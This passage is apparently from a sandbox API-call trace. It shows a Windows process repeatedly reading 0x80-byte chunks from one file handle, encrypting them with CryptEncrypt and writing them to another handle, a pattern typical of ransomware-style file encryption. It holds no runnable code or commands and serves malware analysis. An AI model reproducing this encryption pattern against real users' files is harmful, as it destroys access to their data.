lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.090] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.090] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.090] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.090] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.090] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.091] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.091] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.091] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.091] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.091] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.091] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.091] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.091] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.091] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.092] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.092] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.092] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.092] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.092] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.092] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.092] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.092] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.093] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.093] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.093] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.093] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.093] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.093] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.093] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.093] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.093] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.094] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.094] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.094] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.094] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.094] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.094] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.094] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.094] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.095] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: 